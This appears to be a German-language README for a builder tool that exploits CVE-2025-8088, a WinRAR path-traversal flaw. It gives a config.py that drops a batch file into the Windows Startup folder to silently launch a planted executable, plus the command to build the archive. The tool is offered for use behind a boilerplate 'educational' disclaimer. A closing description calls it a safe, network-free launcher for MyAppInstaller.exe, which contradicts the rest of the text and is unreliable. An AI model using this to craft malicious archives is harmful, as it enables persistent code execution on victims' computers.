
CVE-2025-8088-BUILDER
⚠ Dieses Tool dient ausschließlich zu Bildungszwecken. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.
Ein Python-Skript, das CVE-2025-8088 ausnutzt, eine Path-Traversal-Schwachstelle in WinRAR, indem es ein bösartiges Archiv erzeugt, das ausführbare Payloads mithilfe mehrerer relativer Verzeichnisebenen im Windows-Autostart-Ordner platziert, um eine zuverlässige Ausführung unabhängig vom Entpackungsort sicherzustellen.
Konfigurieren Sie die Datei config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Um eine eigene Lockvogel-Datei zu verwenden, geben Sie anstelle des Namens den vollständigen Pfad an.
Führen Sie das Skript aus:
python CVE-2025-8088.py
Die Ausgabe erscheint im Ausgabeordner.
Dieses Tool dient ausschließlich zu Bildungszwecken. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.
Autor: Desert Scripts
Beschreibung:
Ein lokaler, offline arbeitender Launcher, der MyAppInstaller.exe ausführt.
Keine Netzwerkaktivität. Sicher und transparent.